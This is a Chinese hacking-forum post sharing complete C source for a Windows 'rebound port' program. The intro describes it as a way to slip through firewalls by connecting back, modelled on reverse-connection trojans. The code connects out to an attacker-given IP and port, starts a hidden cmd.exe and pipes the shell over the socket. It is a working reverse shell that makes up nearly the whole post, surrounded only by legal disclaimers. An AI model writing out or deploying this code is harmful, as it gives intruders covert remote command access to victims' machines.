HanDs
NO.2

[Visual Studio文章] Windows下端口反弹 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

Windows下端口反弹
这是一个Windows下的小程序,可以穿透防火墙反弹连接,当然这是最简单的!看到网络上反弹木马到处都是,心一热就有了这个了(代码很垃圾的)。

/* ==============================
Rebound port in Windows NT
By shucx,2003/10
===============================*/
#include <windows.h>
#include <stdio.h>

#pragma comment(lib,"wsock32.lib")

void OutputShell();
SOCKET sClient;
char *szMsg="Rebound port in Windows NT\nBy shucx,2003/10\nRebound successful,Entry Please!\n";

void main(int argc,char **argv)
{
WSADATA stWsaData;
int nRet;
SOCKADDR_IN stSaiClient,stSaiServer;

if(argc != 3)
{
printf("Useage:\n\rRebound DestIP DestPort\n");
return;
}

WSAStartup(MAKEWORD(2,2),&stWsaData);

sClient = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

stSaiClient.sin_family = AF_INET;
stSaiClient.sin_port = htons(0);
stSaiClient.sin_addr.S_un.S_addr = htonl(INADDR_ANY);

if((nRet = bind(sClient,(SOCKADDR *)&stSaiClient,sizeof(stSaiClient)))==SOCKET_ERROR)
{
printf("Bind Socket Failed!\n");
return;
}

stSaiServer.sin_family = AF_INET;
stSaiServer.sin_port = htons((u_short)atoi(argv[2]));
stSaiServer.sin_addr.s_addr = inet_addr(argv[1]);

if(connect(sClient, (struct sockaddr *)&stSaiServer, sizeof(stSaiServer))==SOCKET_ERROR)
{
printf("Connect Error!");
return;
}
OutputShell();
}

void OutputShell()
{
char szBuff[1024];
SECURITY_ATTRIBUTES stSecurityAttributes;
OSVERSIONINFO stOsversionInfo;
HANDLE hReadShellPipe,hWriteShellPipe,hReadPipe,hWritePipe;
STARTUPINFO stStartupInfo;
char *szShell;
PROCESS_INFORMATION stProcessInformation;
unsigned long lBytesRead;

stOsversionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

stSecurityAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
stSecurityAttributes.lpSecurityDescriptor = 0;
stSecurityAttributes.bInheritHandle = TRUE;


CreatePipe(&hReadShellPipe,&hWriteShellPipe,&stSecurityAttributes,0);
CreatePipe(&hReadPipe,&hWritePipe,&stSecurityAttributes,0);

ZeroMemory(&stStartupInfo,sizeof(stStartupInfo));
stStartupInfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
stStartupInfo.wShowWindow = SW_HIDE;
stStartupInfo.hStdInput = hReadPipe;
stStartupInfo.hStdOutput = stStartupInfo.hStdError = hWriteShellPipe;

GetVersionEx(&stOsversionInfo);

switch(stOsversionInfo.dwPlatformId)
{
case 1:
szShell = "command.com";
break;
default:
szShell = "cmd.exe";
break;
}

CreateProcess(NULL,szShell,NULL,NULL,1,0,NULL,NULL,&stStartupInfo,&stProcessInformation);

send(sClient,szMsg,77,0);
while(1)
{
PeekNamedPipe(hReadShellPipe,szBuff,1024,&lBytesRead,0,0);
if(lBytesRead)
{
ReadFile(hReadShellPipe,szBuff,lBytesRead,&lBytesRead,0);
send(sClient,szBuff,lBytesRead,0);
}
else
{
lBytesRead=recv(sClient,szBuff,1024,0);
if(lBytesRead<=0) break;
WriteFile(hWritePipe,szBuff,lBytesRead,&lBytesRead,0);
}
}

return;
}


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
Windows 下端口反弹
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组